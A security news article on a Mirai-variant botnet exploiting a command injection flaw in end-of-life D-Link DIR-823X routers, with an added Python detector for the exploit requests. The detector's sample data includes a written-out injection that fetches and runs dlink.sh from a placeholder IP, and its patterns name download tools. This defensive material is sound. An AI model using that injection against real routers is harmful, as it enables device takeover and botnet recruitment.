Mirai Botnet Exploits Critical RCE Flaw in End-of-Life D-Link Routers
Take action: If you are using a D-Link DIR-823X router, you are under attack. Make sure its management interface is isolated from the internet and accessible only from trusted networks. Since this device is end-of-life with no patch coming for CVE-2025-29635, replace it with a currently supported model.
CISA reports that a new Mirai-based malware campaign is actively exploiting a high-severity command injection vulnerability in end-of-life D-Link DIR-823X routers to recruit devices into a growing botnet.
The flaw, tracked as CVE-2025-29635 (CVSS score 7.5), allows an authorized attacker to execute arbitrary commands on remote devices by sending a crafted POST request to the /goform/set_prohibiting endpoint, triggering remote code execution (RCE). It was first reported 13 months ago by security researchers Wang Jinshuai and Zhao Jiangting, who briefly published a proof-of-concept exploit on GitHub before retracting it.
Akamai's Security Intelligence Response Team (SIRT) detected the first in-the-wild active exploitation attempts in early March 2026 through its global network of honeypots.
According to Akamai's observations, attackers are sending POST requests that change directories across writable paths, download a shell script named dlink.sh from an external IP, and execute it. The script installs a Mirai-based malware variant dubbed "tuxnokill," which supports multiple architectures and features the standard Mirai distributed denial-of-service (DDoS) attack repertoire, including TCP SYN/ACK/STOMP floods, UDP floods, and HTTP null attacks.
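A defender-side check for the request pattern described above, added here as an example (it is not code from Akamai, CISA or this article): it inspects POST requests to the named endpoint for shell metacharacters and download-and-execute tokens such as the dlink.sh stage. The log record shape, the form field name `field`, the IP and the sample bodies are constructed placeholders; the article does not name the injectable parameter, so every form value is checked.

```python
import re
from urllib.parse import parse_qs

# Endpoint named for CVE-2025-29635; requests to any other path are ignored here.
VULN_PATH = "/goform/set_prohibiting"

# Shell metacharacters that have no place in a router form value.
SHELL_META = re.compile(r"[;&|`]|\$\(|\n")
# Download-and-execute tokens matching the reported "cd, fetch dlink.sh, run it" chain.
DROPPER = re.compile(r"\b(wget|curl|tftp|ftpget)\b|\.sh\b|\bchmod\b|\bcd\s+/", re.I)


def classify_request(req):
    """Return reasons this request looks like exploitation, or [] if clean.
    req is a dict with 'method', 'path', 'body' (assumed honeypot/WAF log shape)."""
    if req.get("method") != "POST" or req.get("path") != VULN_PATH:
        return []
    reasons = []
    # Decode every form value (+ and %xx) instead of grepping the raw body,
    # so URL-encoded metacharacters are not missed.
    values = [v for vs in parse_qs(req.get("body", ""), keep_blank_values=True).values()
              for v in vs]
    for v in values:
        if SHELL_META.search(v):
            reasons.append(f"shell metacharacter in value {v[:40]!r}")
        if DROPPER.search(v):
            reasons.append(f"download/exec token in value {v[:40]!r}")
    return reasons


def scan(requests):
    """Return (index, reasons) for every request that should raise an alert."""
    return [(i, r) for i, req in enumerate(requests) if (r := classify_request(req))]


# Constructed sample records (not real captures): a benign settings change,
# an injection shaped like the reported chain with a placeholder IP, and an
# unrelated GET that must not be flagged.
SAMPLE = [
    {"method": "POST", "path": VULN_PATH, "body": "field=00:11:22:33:44:55&enable=1"},
    {"method": "POST", "path": VULN_PATH,
     "body": "field=x;cd+/tmp;wget+http://203.0.113.10/dlink.sh;sh+dlink.sh"},
    {"method": "GET", "path": "/index.html", "body": ""},
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE):
        print(f"request {i}: {'; '.join(reasons)}")
```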
The impacted D-Link DIR-823X devices running firmware versions 240126 and 24082 reached end-of-life (EoL) status in November 2024, so the latest firmware available for the model does not patch CVE-2025-29635. D-Link does not make exceptions to its EoL policy even when active exploitation is detected, so a patch is unlikely to be released.
Users operating EoL routers are strongly advised to upgrade to a newer model that receives active support with frequent security fixes. At minimum, disable remote administration portals when they are not needed and change the default administrator credentials.